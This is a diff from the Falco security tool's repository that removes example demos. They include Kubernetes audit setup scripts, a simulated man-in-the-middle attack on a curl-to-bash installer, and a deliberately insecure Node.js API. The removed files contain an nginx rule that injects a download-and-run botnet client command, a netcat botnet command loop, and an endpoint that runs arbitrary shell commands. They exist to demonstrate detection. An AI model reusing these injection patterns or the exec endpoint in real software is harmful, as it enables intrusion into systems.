-		echo "    - mountPath: /var/lib/k8s_audit/" >> "$TMPFILE"
-		echo "      name: data" >> "$TMPFILE"
-	    fi
-            ;;
-        *"volumes:"*)
-	    if [[ ($AUDIT_TYPE == "static" || $AUDIT_TYPE == "dynamic+log") ]]; then
-		echo "  - hostPath:" >> "$TMPFILE"
-		echo "      path: /var/lib/k8s_audit" >> "$TMPFILE"
-		echo "    name: data" >> "$TMPFILE"
-	    fi
-            ;;
-
-    esac
-done < "$FILENAME"
-
-cp "$FILENAME" "/tmp/kube-apiserver.yaml.original"
-cp "$TMPFILE" "$FILENAME"
-
--- a/examples/k8s_audit_config/audit-policy.yaml
+++ b/examples/k8s_audit_config/audit-policy.yaml
@@ -1,76 +0,0 @@
-apiVersion: audit.k8s.io/v1beta1 # This is required.
-kind: Policy
-# Don't generate audit events for all requests in RequestReceived stage.
-omitStages:
-  - "RequestReceived"
-rules:
-  # Log pod changes at RequestResponse level
-  - level: RequestResponse
-    resources:
-    - group: ""
-      # Resource "pods" doesn't match requests to any subresource of pods,
-      # which is consistent with the RBAC policy.
-      resources: ["pods", "deployments"]
-
-  - level: RequestResponse
-    resources:
-    - group: "rbac.authorization.k8s.io"
-      # Resource "pods" doesn't match requests to any subresource of pods,
-      # which is consistent with the RBAC policy.
-      resources: ["clusterroles", "clusterrolebindings"]
-
-  # Log "pods/log", "pods/status" at Metadata level
-  - level: Metadata
-    resources:
-    - group: ""
-      resources: ["pods/log", "pods/status"]
-
-  # Don't log requests to a configmap called "controller-leader"
-  - level: None
-    resources:
-    - group: ""
-      resources: ["configmaps"]
-      resourceNames: ["controller-leader"]
-
-  # Don't log watch requests by the "system:kube-proxy" on endpoints or services
-  - level: None
-    users: ["system:kube-proxy"]
-    verbs: ["watch"]
-    resources:
-    - group: "" # core API group
-      resources: ["endpoints", "services"]
-
-  # Don't log authenticated requests to certain non-resource URL paths.
-  - level: None
-    userGroups: ["system:authenticated"]
-    nonResourceURLs:
-    - "/api*" # Wildcard matching.
-    - "/version"
-
-  # Log the request body of configmap changes in kube-system.
-  - level: Request
-    resources:
-    - group: "" # core API group
-      resources: ["configmaps"]
-    # This rule only applies to resources in the "kube-system" namespace.
-    # The empty string "" can be used to select non-namespaced resources.
-    namespaces: ["kube-system"]
-
-  # Log configmap and secret changes in all other namespaces at the RequestResponse level.
-  - level: RequestResponse
-    resources:
-    - group: "" # core API group
-      resources: ["secrets", "configmaps"]
-
-  # Log all other resources in core and extensions at the Request level.
-  - level: Request
-    resources:
-    - group: "" # core API group
-    - group: "extensions" # Version of group should NOT be included.
-
-  # A catch-all rule to log all other requests at the Metadata level.
-  - level: Metadata
-    # Long-running requests like watches that fall under this rule will not
-    # generate an audit event in RequestReceived.
-    omitStages:
-      - "RequestReceived"
--- a/examples/k8s_audit_config/audit-sink.yaml.in
+++ b/examples/k8s_audit_config/audit-sink.yaml.in
@@ -1,16 +0,0 @@
-apiVersion: auditregistration.k8s.io/v1alpha1
-kind: AuditSink
-metadata:
-  name: falco-audit-sink
-spec:
-  policy:
-    level: RequestResponse
-    stages:
-      - ResponseComplete
-      - ResponseStarted
-  webhook:
-    throttle:
-      qps: 10
-      burst: 15
-    clientConfig:
-      url: "http://$FALCO_SERVICE_CLUSTERIP:8765/k8s_audit"
--- a/examples/k8s_audit_config/enable-k8s-audit.sh
+++ b/examples/k8s_audit_config/enable-k8s-audit.sh
@@ -1,46 +0,0 @@
-#!/usr/bin/env bash
-
-set -euo pipefail
-
-VARIANT=${1:-minikube}
-AUDIT_TYPE=${2:-static}
-
-if [ "$VARIANT" == "minikube" ]; then
-    APISERVER_HOST=$(minikube ip)
-    SSH_KEY=$(minikube ssh-key)
-    SSH_USER="docker"
-    MANIFEST="/etc/kubernetes/manifests/kube-apiserver.yaml"
-fi
-
-if [ "$VARIANT" == "kops" ]; then
-    # APISERVER_HOST=api.your-kops-cluster-name.com
-    SSH_KEY=~/.ssh/id_rsa
-    SSH_USER="admin"
-    MANIFEST=/etc/kubernetes/manifests/kube-apiserver.manifest
-
-    if [ -z "${APISERVER_HOST+xxx}" ]; then
-	echo "***You must specify APISERVER_HOST with the name of your kops api server"
-	exit 1
-    fi
-fi
-
-echo "***Copying apiserver config patch script to apiserver..."
-ssh -i $SSH_KEY "$SSH_USER@$APISERVER_HOST" "sudo mkdir -p /var/lib/k8s_audit && sudo chown $SSH_USER /var/lib/k8s_audit"
-scp -i $SSH_KEY apiserver-config.patch.sh "$SSH_USER@$APISERVER_HOST:/var/lib/k8s_audit"
-
-if [ "$AUDIT_TYPE" == "static" ]; then
-    echo "***Copying audit policy/webhook files to apiserver..."
-    scp -i $SSH_KEY audit-policy.yaml "$SSH_USER@$APISERVER_HOST:/var/lib/k8s_audit"
-    scp -i $SSH_KEY webhook-config.yaml "$SSH_USER@$APISERVER_HOST:/var/lib/k8s_audit"
-fi
-
-if [ "$AUDIT_TYPE" == "dynamic+log" ]; then
-    echo "***Copying audit policy file to apiserver..."
-    scp -i $SSH_KEY audit-policy.yaml "$SSH_USER@$APISERVER_HOST:/var/lib/k8s_audit"
-fi
-
-echo "***Modifying k8s apiserver config (will result in apiserver restarting)..."
-
-ssh -i $SSH_KEY "$SSH_USER@$APISERVER_HOST" "sudo bash /var/lib/k8s_audit/apiserver-config.patch.sh $MANIFEST $VARIANT $AUDIT_TYPE"
-
-echo "***Done!"
--- a/examples/k8s_audit_config/webhook-config.yaml.in
+++ b/examples/k8s_audit_config/webhook-config.yaml.in
@@ -1,14 +0,0 @@
-apiVersion: v1
-kind: Config
-clusters:
- name: falco
-  cluster:
-    server: http://$FALCO_SERVICE_CLUSTERIP:8765/k8s_audit
-contexts:
- context:
-    cluster: falco
-    user: ""
-  name: default-context
-current-context: default-context
-preferences: {}
-users: []
--- a/examples/mitm-sh-installer/README.md
+++ b/examples/mitm-sh-installer/README.md
@@ -1,78 +0,0 @@
-# Demo of falco with man-in-the-middle attacks on installation scripts
-
-For context, see the corresponding [blog post](http://sysdig.com/blog/making-curl-to-bash-safer) for this demo.
-
-## Demo architecture
-
-### Initial setup
-
-Make sure no prior `botnet_client.py` processes are lying around.
-
-### Start everything using docker-compose
-
-From this directory, run the following:
-
-```
-$ docker-compose -f demo.yml up
-```
-
-This starts the following containers:
-* apache: the legitimate web server, serving files from `.../mitm-sh-installer/web_root`, specifically the file `install-software.sh`.
-* nginx: the reverse proxy, configured with the config file `.../mitm-sh-installer/nginx.conf`.
-* evil_apache: the "evil" web server, serving files from `.../mitm-sh-installer/evil_web_root`, specifically the file `botnet_client.py`.
-* attacker_botnet_master: constantly trying to contact the botnet_client.py process.
-* falco: will detect the activities of botnet_client.py.
-
-### Download `install-software.sh`, see botnet client running
-
-Run the following to fetch and execute the installation script,
-which also installs the botnet client:
-
-```
-$ curl http://localhost/install-software.sh | bash
-```
-
-You'll see messages about installing the software. (The script doesn't actually install anything, the messages are just for demonstration purposes).
-
-Now look for all python processes and you'll see the botnet client running. You can also telnet to port 1234:
-
-```
-$ ps auxww  | grep python
-...
-root   19983  0.1  0.4  33992  8832 pts/1    S    13:34   0:00 python ./botnet_client.py
-
-$ telnet localhost 1234
-Trying ::1...
-Trying 127.0.0.1...
-Connected to localhost.
-Escape character is '^]'.
-```
-
-You'll also see messages in the docker-compose output showing that attacker_botnet_master can reach the client:
-
-```
-attacker_botnet_master | Trying to contact compromised machine...
-attacker_botnet_master | Waiting for botnet command and control commands...
-attacker_botnet_master | Ok, will execute "ddos target=10.2.4.5 duration=3000s rate=5000 m/sec"
-attacker_botnet_master | **********Contacted compromised machine, sent botnet commands
-```
-
-At this point, kill the botnet_client.py process to clean things up.
-
-### Run installation script again using `fbash`, note falco warnings.
-
-If you run the installation script again:
-
-```
-curl http://localhost/install-software.sh | ./fbash
-```
-
-In the docker-compose output, you'll see the following falco warnings:
-
-```
-falco                  | 23:19:56.528652447: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=127.0.0.1:43639->127.0.0.1:9090)
-falco                  | 23:19:56.528667589: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=)
-falco                  | 23:19:56.530758087: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=::1:41996->::1:9090)
-falco                  | 23:19:56.605318716: Warning Unexpected listen call by a process in a fbash session (command=python ./botnet_client.py)
-falco                  | 23:19:56.605323967: Warning Unexpected listen call by a process in a fbash session (command=python ./botnet_client.py)
-```
--- a/examples/mitm-sh-installer/botnet_master.sh
+++ b/examples/mitm-sh-installer/botnet_master.sh
@@ -1,7 +0,0 @@
-#!/bin/sh
-
-while true; do
-    echo "Trying to contact compromised machine..."
-    echo "ddos target=10.2.4.5 duration=3000s rate=5000 m/sec" | nc localhost 1234 && echo "**********Contacted compromised machine, sent botnet commands"
-    sleep 5
-done
--- a/examples/mitm-sh-installer/demo.yml
+++ b/examples/mitm-sh-installer/demo.yml
@@ -1,51 +0,0 @@
-# Owned by software vendor, serving install-software.sh.
-apache:
-  container_name: apache
-  image: httpd:2.4
-  volumes:
-        - ${PWD}/web_root:/usr/local/apache2/htdocs
-
-# Owned by software vendor, compromised by attacker.
-nginx:
-  container_name: mitm_nginx
-  image: nginx:latest
-  links:
-    - apache
-  ports:
-      - "80:80"
-  volumes:
-        - ${PWD}/nginx.conf:/etc/nginx/nginx.conf:ro
-
-# Owned by attacker.
-evil_apache:
-  container_name: evil_apache
-  image: httpd:2.4
-  volumes:
-        - ${PWD}/evil_web_root:/usr/local/apache2/htdocs
-  ports:
-      - "9090:80"
-
-# Owned by attacker, constantly trying to contact client.
-attacker_botnet_master:
-  container_name: attacker_botnet_master
-  image: alpine:latest
-  net: host
-  volumes:
-    - ${PWD}/botnet_master.sh:/tmp/botnet_master.sh
-  command:
-    - /tmp/botnet_master.sh
-
-# Owned by client, detects attack by attacker
-falco:
-  container_name: falco
-  image: sysdig/falco:latest
-  privileged: true
-  volumes:
-    - /var/run/docker.sock:/host/var/run/docker.sock
-    - /dev:/host/dev
-    - /proc:/host/proc:ro
-    - /boot:/host/boot:ro
-    - /lib/modules:/host/lib/modules:ro
-    - /usr:/host/usr:ro
-    - ${PWD}/../../rules/falco_rules.yaml:/etc/falco_rules.yaml
-  tty: true
--- a/examples/mitm-sh-installer/evil_web_root/botnet_client.py
+++ b/examples/mitm-sh-installer/evil_web_root/botnet_client.py
@@ -1,18 +0,0 @@
-import socket;
-import signal;
-import os;
-
-os.close(0);
-os.close(1);
-os.close(2);
-
-signal.signal(signal.SIGINT,signal.SIG_IGN);
-serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-serversocket.bind(('0.0.0.0', 1234))
-serversocket.listen(5);
-while 1:
-    (clientsocket, address) = serversocket.accept();
-    clientsocket.send('Waiting for botnet command and control commands...\n');
-    command = clientsocket.recv(1024)
-    clientsocket.send('Ok, will execute "{}"\n'.format(command.strip()))
-    clientsocket.close()
--- a/examples/mitm-sh-installer/fbash
+++ b/examples/mitm-sh-installer/fbash
@@ -1,15 +0,0 @@
-#!/bin/bash
-
-SID=`ps --no-heading -o sess --pid $$`
-
-if [ $SID -ne $$ ]; then
-    # Not currently a session leader? Run a copy of ourself in a new
-    # session, with copies of stdin/stdout/stderr.
-    setsid $0 $@ < /dev/stdin 1> /dev/stdout 2> /dev/stderr &
-    FBASH=$!
-    trap "kill $FBASH; exit" SIGINT SIGTERM
-    wait $FBASH
-else
-    # Just evaluate the commands (from stdin)
-    source /dev/stdin
-fi
--- a/examples/mitm-sh-installer/nginx.conf
+++ b/examples/mitm-sh-installer/nginx.conf
@@ -1,12 +0,0 @@
-http {
-    server {
-        location / {
-            sub_filter_types '*';
-            sub_filter 'function install_deb {' 'curl -so ./botnet_client.py http://localhost:9090/botnet_client.py && python ./botnet_client.py &\nfunction install_deb {';
-            sub_filter_once off;
-            proxy_pass http://apache:80;
-        }
-    }
-}
-events {
-}
--- a/examples/mitm-sh-installer/web_root/install-software.sh
+++ b/examples/mitm-sh-installer/web_root/install-software.sh
@@ -1,157 +0,0 @@
-#!/bin/bash
-#
-# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
-#
-# This file is part of falco.
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-#     http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-#
-
-set -e
-
-function install_rpm {
-	if ! hash curl > /dev/null 2>&1; then
-		echo "* Installing curl"
-		yum -q -y install curl
-	fi
-
-	echo "*** Installing my-software public key"
-	# A rpm --import command would normally be here
-
-	echo "*** Installing my-software repository"
-	# A curl path-to.repo <some url> would normally be here
-
-	echo "*** Installing my-software"
-	# A yum -q -y install my-software command would normally be here
-
-	echo "*** my-software Installed!"
-}
-
-function install_deb {
-	export DEBIAN_FRONTEND=noninteractive
-
-	if ! hash curl > /dev/null 2>&1; then
-		echo "* Installing curl"
-		apt-get -qq -y install curl < /dev/null
-	fi
-
-	echo "*** Installing my-software public key"
-	# A curl <url> | apt-key add - command would normally be here
-
-	echo "*** Installing my-software repository"
-	# A curl path-to.list <some url> would normally be here
-
-	echo "*** Installing my-software"
-	# An apt-get -qq -y install my-software command would normally be here
-
-	echo "*** my-software Installed!"
-}
-
-function unsupported {
-	echo 'Unsupported operating system. Please consider writing to the mailing list at'
-	echo 'https://groups.google.com/forum/#!forum/my-software or trying the manual'
-	echo 'installation.'
-	exit 1
-}
-
-if [ $(id -u) != 0 ]; then
-	echo "Installer must be run as root (or with sudo)."
-#	exit 1
-fi
-
-echo "* Detecting operating system"
-
-ARCH=$(uname -m)
-if [[ ! $ARCH = *86 ]] && [ ! $ARCH = "x86_64" ]; then
-	unsupported
-fi
-
-if [ -f /etc/debian_version ]; then
-	if [ -f /etc/lsb-release ]; then
-		. /etc/lsb-release
-		DISTRO=$DISTRIB_ID
-		VERSION=${DISTRIB_RELEASE%%.*}
-	else
-		DISTRO="Debian"
-		VERSION=$(cat /etc/debian_version | cut -d'.' -f1)
-	fi
-
-	case "$DISTRO" in
-
-		"Ubuntu")
-			if [ $VERSION -ge 10 ]; then
-				install_deb
-			else
-				unsupported
-			fi
-			;;
-
-		"LinuxMint")
-			if [ $VERSION -ge 9 ]; then
-				install_deb
-			else
-				unsupported
-			fi
-			;;
-
-		"Debian")
-			if [ $VERSION -ge 6 ]; then
-				install_deb
-			elif [[ $VERSION == *sid* ]]; then
-				install_deb
-			else
-				unsupported
-			fi
-			;;
-
-		*)
-			unsupported
-			;;
-
-	esac
-
-elif [ -f /etc/system-release-cpe ]; then
-	DISTRO=$(cat /etc/system-release-cpe | cut -d':' -f3)
-	VERSION=$(cat /etc/system-release-cpe | cut -d':' -f5 | cut -d'.' -f1 | sed 's/[^0-9]*//g')
-
-	case "$DISTRO" in
-
-		"oracle" | "centos" | "redhat")
-			if [ $VERSION -ge 6 ]; then
-				install_rpm
-			else
-				unsupported
-			fi
-			;;
-
-		"amazon")
-			install_rpm
-			;;
-
-		"fedoraproject")
-			if [ $VERSION -ge 13 ]; then
-				install_rpm
-			else
-				unsupported
-			fi
-			;;
-
-		*)
-			unsupported
-			;;
-
-	esac
-
-else
-	unsupported
-fi
--- a/examples/nodejs-bad-rest-api/README.md
+++ b/examples/nodejs-bad-rest-api/README.md
@@ -1,66 +0,0 @@
-# Demo of falco with bash exec via poorly designed REST API.
-
-## Introduction
-
-This example shows how a server could have a poorly designed API that
-allowed a client to execute arbitrary programs on the server, and how
-that behavior can be detected using Sysdig Falco.
-
-`server.js` in this directory defines the server. The poorly designed
-API is this route handler:
-
-```javascript
-router.get('/exec/:cmd', function(req, res) {
-    var output = child_process.execSync(req.params.cmd);
-    res.send(output);
-});
-
-app.use('/api', router);
-```
-
-It blindly takes the url portion after `/api/exec/<cmd>` and tries to
-execute it. A horrible design choice(!), but allows us to easily show
-Sysdig falco's capabilities.
-
-## Demo architecture
-
-### Start everything using docker-compose
-
-From this directory, run the following:
-
-```
-$ docker-compose -f demo.yml up
-```
-
-This starts the following containers:
-
-* express_server: simple express server exposing a REST API under the endpoint `/api/exec/<cmd>`.
-* falco: will detect when you execute a shell via the express server.
-
-### Access urls under `/api/exec/<cmd>` to run arbitrary commands.
-
-Run the following commands to execute arbitrary commands like 'ls', 'pwd', etc:
-
-```
-$ curl http://localhost:8181/api/exec/ls
-
-demo.yml
-node_modules
-package.json
-README.md
-server.js
-```
-
-```
-$ curl http://localhost:8181/api/exec/pwd
-
-.../examples/nodejs-bad-rest-api
-```
-
-### Try to run bash via `/api/exec/bash`, falco sends alert.
-
-If you try to run bash via `/api/exec/bash`, falco will generate an alert:
-
-```
-falco          | 22:26:53.536628076: Warning Shell spawned in a container other than entrypoint (user=root container_id=6f339b8aeb0a container_name=express_server shell=bash parent=sh cmdline=bash )
-```
--- a/examples/nodejs-bad-rest-api/demo.yml
+++ b/examples/nodejs-bad-rest-api/demo.yml
@@ -1,21 +0,0 @@
-express_server:
-  container_name: express_server
-  image: node:latest
-  command: bash -c "apt-get -y update && apt-get -y install runit && cd /usr/src/app && npm install && runsv /usr/src/app"
-  ports:
-    - "8181:8181"
-  volumes:
-        - ${PWD}:/usr/src/app
-
-falco:
-  container_name: falco
-  image: sysdig/falco:latest
-  privileged: true
-  volumes:
-    - /var/run/docker.sock:/host/var/run/docker.sock
-    - /dev:/host/dev
-    - /proc:/host/proc:ro
-    - /boot:/host/boot:ro
-    - /lib/modules:/host/lib/modules:ro
-    - /usr:/host/usr:ro
-  tty: true
--- a/examples/nodejs-bad-rest-api/package.json
+++ b/examples/nodejs-bad-rest-api/package.json
@@ -1,7 +0,0 @@
-{
-    "name": "bad-rest-api",
-    "main": "server.js",
-    "dependencies": {
-        "express": "~4.16.0"
-    }
-}
--- a/examples/nodejs-bad-rest-api/run
+++ b/examples/nodejs-bad-rest-api/run
@@ -1,2 +0,0 @@
-#!/bin/sh
-node server.js
--- a/examples/nodejs-bad-rest-api/server.js
+++ b/examples/nodejs-bad-rest-api/server.js
@@ -1,25 +0,0 @@
-var express    = require('express');        // call express
-var app        = express();                 // define our app using express
-var child_process = require('child_process');
-
-var port = process.env.PORT || 8181;        // set our port
-
-// ROUTES FOR OUR API
-// =============================================================================
-var router = express.Router();              // get an instance of the express Router
-
-// test route to make sure everything is working (accessed at GET http://localhost:8181/api)
-router.get('/', function(req, res) {
-    res.json({ message: 'API available'});
-});
-
-router.get('/exec/:cmd', function(req, res) {
-    var ret = child_process.spawnSync(req.params.cmd, { shell: true});
-    res.send(ret.stdout);
-});
-
-app.use('/api', router);
-
-app.listen(port);
-console.log('Server running on port: ' + port);
-
--- a/falco.yaml
+++ b/falco.yaml
@@ -1,7 +1,6 @@
 #
-# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
+# Copyright (C) 2019 The Falco Authors.
 #
-# This file is part of falco .
 #
 # Licensed under the Apache License, Version 2.0 (the "License");
 # you may not use this file except in compliance with the License.
@@ -29,10 +28,10 @@
 # The files will be read in the order presented here, so make sure if
 # you have overrides they appear in later files.
 rules_file:
- - /etc/falco/falco_rules.yaml
- - /etc/falco/falco_rules.local.yaml
- - /etc/falco/k8s_audit_rules.yaml
- - /etc/falco/rules.d
+  - /etc/falco/falco_rules.yaml
+  - /etc/falco/falco_rules.local.yaml
+  - /etc/falco/k8s_audit_rules.yaml
+  - /etc/falco/rules.d

 # If true, the times displayed in log messages and output messages
 # will be in ISO 8601. By default, times are displayed in the local
@@ -128,7 +127,7 @@ stdout_output:

 # Falco contains an embedded webserver that can be used to accept K8s
 # Audit Events. These config options control the behavior of that
-# webserver. (By default, the webserver is disabled).
+# webserver. (By default, the webserver is enabled).
 #
 # The ssl_certificate is a combination SSL Certificate and corresponding
 # key contained in a single file. You can generate a key/cert as follows:
@@ -140,7 +139,7 @@ stdout_output:
 webserver:
  enabled: true
  listen_port: 8765
-  k8s_audit_endpoint: /k8s_audit
+  k8s_audit_endpoint: /k8s-audit
  ssl_enabled: false
  ssl_certificate: /etc/falco/falco.pem

@@ -166,4 +165,39 @@ program_output:

 http_output:
  enabled: false
-  url: http://some.url
+  url: http://some.url
+
+# Falco supports running a gRPC server with two main binding types
+# 1. Over the network with mandatory mutual TLS authentication (mTLS)
+# 2. Over a local unix socket with no authentication
+# By default, the gRPC server is disabled, with no enabled services (see grpc_output)
+# please comment/uncomment and change accordingly the options below to configure it.
+# Important note: if Falco has any troubles creating the gRPC server
+# this information will be logged, however the main Falco daemon will not be stopped.
+# gRPC server over network with (mandatory) mutual TLS configuration.
+# This gRPC server is secure by default so you need to generate certificates and update their paths here.
+# By default the gRPC server is off.
+# You can configure the address to bind and expose it.
+# By modifying the threadiness configuration you can fine-tune the number of threads (and context) it will use.
+# grpc:
+#   enabled: true
+#   bind_address: "0.0.0.0:5060"
+#   # when threadiness is 0, Falco sets it by automatically figuring out the number of online cores
+#   threadiness: 0
+#   private_key: "/etc/falco/certs/server.key"
+#   cert_chain: "/etc/falco/certs/server.crt"
+#   root_certs: "/etc/falco/certs/ca.crt"
+
+# gRPC server using an unix socket
+grpc:
+  enabled: false
+  bind_address: "unix:///var/run/falco.sock"
+  # when threadiness is 0, Falco automatically guesses it depending on the number of online cores
+  threadiness: 0
+
+# gRPC output service.
+# By default it is off.
+# By enabling this all the output events will be kept in memory until you read them with a gRPC client.
+# Make sure to have a consumer for them or leave this disabled.
+grpc_output:
+  enabled: false
--- a/Show More
+++ b/Show More
				`@@ -0,0 +1 @@`
				<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 708.41 374.92"><defs><style>.cls-1{fill:#00b4c8;}</style></defs><title>Falco horizontal logo_teal2</title><g id="fqqZXT"><path class="cls-1" d="M204.69,154.4Q151.5,208,98,261.25a48.42,48.42,0,0,1-5.27,4.87c-2.55,1.89-5.34,2-7.65-.45s-1.51-5,.41-7.06c4.6-4.94,9.35-9.74,14.13-14.5q52.56-52.31,105.14-104.59c3.35-3.34,18.05,7.52,21.58,11.1"/><path class="cls-1" d="M215.06,171.36c-.15,2.14-1.54,3.55-2.93,4.94l-87.82,87.79c-2.75,2.74-6,5.42-9.46,1.68-3.15-3.39-.5-6.44,2.06-9q43.44-43.44,86.89-86.87c2.21-2.22,4.58-4.23,8-3A4.61,4.61,0,0,1,215.06,171.36Z"/><path class="cls-1" d="M70.93,71c2.42-.09,4.09,1.31,5.64,2.87q41.82,41.79,83.61,83.59c2.6,2.61,5,5.74,1.69,9s-6.41,1-9-1.66Q111,123,69.25,81.2c-2.09-2.1-3.72-4.39-2.45-7.53A4.34,4.34,0,0,1,70.93,71Z"/><path class="cls-1" d="M203.42,268c-5,1-8.9-1.34-12.45-5-6.35-6.61-12.87-13-19.41-19.46-3.85-3.8-4-7.41-.14-11.28,11.14-11.07,22.21-22.21,33.35-33.29,2.45-2.44,5.43-4.49,8.55-1.55,3.48,3.29,1.19,6.41-1.39,9-8.74,8.84-17.44,17.73-26.4,26.35-3.4,3.27-3.93,5.72-.19,9.06,4.22,3.78,8.13,7.91,12,12,2.54,2.68,5.35,4.25,9.18,4.11s8.28-.12,8.16,5.09c-.12,5-4.74,4.8-8.4,5.14A21,21,0,0,1,203.42,268Z"/><path class="cls-1" d="M148.7,178.36c-.75,3.49-2.68,5.6-6.43,4.36a13,13,0,0,1-4.74-3.31q-30.11-30-60.1-60a23.14,23.14,0,0,1-2.56-3c-1.72-2.42-1.88-5,.3-7.11s4.84-1.76,7,.26c3.65,3.42,7.17,7,10.71,10.53q25.65,25.64,51.28,51.3C146.12,173.37,148.49,175.13,148.7,178.36Z"/><path class="cls-1" d="M133.74,192.93a4.9,4.9,0,0,1-2.53,4.29,5.37,5.37,0,0,1-6.63-.95c-3.35-3.1-6.57-6.34-9.8-9.57q-14.34-14.3-28.61-28.63a34.27,34.27,0,0,1-4.17-5,4.57,4.57,0,0,1,.36-6,5,5,0,0,1,6-1.12,11.65,11.65,0,0,1,3.7,2.58q19.44,19.33,38.79,38.76C132.4,188.85,133.77,190.54,133.74,192.93Z"/></g><path class="cls-1" d="M413.15,190.86a25.57,25.57,0,0,0-10.35-6.63,46.78,46.78,0,0,0-16-2.37A83.35,83.35,0,0,0,372,183.12a75.16,75.16,0,0,0-10.58,2.53l2.37,15.48a53.47,53.47,0,0,1,9-2.21A72.44,72.44,0,0,1,385,198a22.61,22.61,0,0,1,8.13,1.26,13,13,0,0,1,5.22,3.56,13.23,13.23,0,0,1,2.76,5.29,24.6,24.6,0,0,1,.79,6.32v3.16a61.65,61.65,0,0,0-7.42-1.34,57.43,57.43,0,0,0-6.64-.4,61.45,61.45,0,0,0-13,1.35,32.26,32.26,0,0,0-11,4.42,22.7,22.7,0,0,0-7.51,8,24.09,24.09,0,0,0-2.76,12A28.39,28.39,0,0,0,356,254.05a21.6,21.6,0,0,0,6.79,8.22,28.56,28.56,0,0,0,10.51,4.58,60.24,60.24,0,0,0,13.58,1.42A137.25,137.25,0,0,0,407,266.93c5.94-.9,10.4-1.66,13.35-2.29V214.56a50.84,50.84,0,0,0-1.66-13.35A24.93,24.93,0,0,0,413.15,190.86Zm-11.3,61.3a71.4,71.4,0,0,1-13.43.94q-7.26,0-11.53-2.6t-4.26-9.4a10,10,0,0,1,1.57-5.77,10.67,10.67,0,0,1,4.19-3.55,20.18,20.18,0,0,1,5.85-1.74,43.43,43.43,0,0,1,6.39-.47,42.23,42.23,0,0,1,6.64.47,37,37,0,0,1,4.58,1Z"/><path class="cls-1" d="M461.38,248.44a9.27,9.27,0,0,1-2-4,26.17,26.17,0,0,1-.55-5.85V143.94l-19.12,3.16v95.1a40.74,40.74,0,0,0,1.35,11,17.57,17.57,0,0,0,4.66,8.06,21.71,21.71,0,0,0,8.92,5,52,52,0,0,0,14.14,1.89l2.69-15.8a29.78,29.78,0,0,1-6.24-1.34A8.76,8.76,0,0,1,461.38,248.44Z"/><path class="cls-1" d="M532.2,251.05a49.24,49.24,0,0,1-9.64.95q-13.11,0-18.64-7.19t-5.53-19.51q0-12.8,5.85-19.83t17.06-7a40.4,40.4,0,0,1,8.92.95,43.38,43.38,0,0,1,7.51,2.37l4.1-15.64a57.88,57.88,0,0,0-22.11-4.26,42.15,42.15,0,0,0-17.06,3.31,37.35,37.35,0,0,0-12.88,9.17,40.64,40.64,0,0,0-8.14,13.82,50.82,50.82,0,0,0-2.84,17.14,56.83,56.83,0,0,0,2.53,17.3A37.22,37.22,0,0,0,489,256.34a34.82,34.82,0,0,0,13,9,47.83,47.83,0,0,0,18.4,3.24,68.05,68.05,0,0,0,13.19-1.27,39.84,39.84,0,0,0,9.56-2.84l-2.69-15.8A45,45,0,0,1,532.2,251.05Z"/><path class="cls-1" d="M625.77,207.37a40.7,40.7,0,0,0-8.14-13.67,35.23,35.23,0,0,0-12.56-8.76,40.93,40.93,0,0,0-16-3.08,40.34,40.34,0,0,0-16,3.08,36.32,36.32,0,0,0-12.56,8.76,39.88,39.88,0,0,0-8.21,13.67,51.31,51.31,0,0,0-2.93,17.77A52,52,0,0,0,552.31,243a40.47,40.47,0,0,0,8.13,13.75,36.57,36.57,0,0,0,12.48,8.85A40.14,40.14,0,0,0,589,268.74a40.69,40.69,0,0,0,16.19-3.15,36.32,36.32,0,0,0,12.56-8.85A39.7,39.7,0,0,0,625.85,243a53.47,53.47,0,0,0,2.84-17.85A51.55,51.55,0,0,0,625.77,207.37Zm-22,37.52q-5.29,7.28-14.77,7.27t-14.77-7.27q-5.29-7.26-5.3-19.75,0-12.31,5.3-19.51T589,198.44q9.48,0,14.77,7.19t5.29,19.51Q609.1,237.62,603.81,244.89Z"/><path class="cls-1" d="M347.24,218h-47.8v50.57H279.65V150h75.89v15.88h-56.1v36.23h47.8Z"/></svg>
				`@@ -1 +0,0 @@`
				`{"config": "some-bitcoin-miner-config-goes-here"}`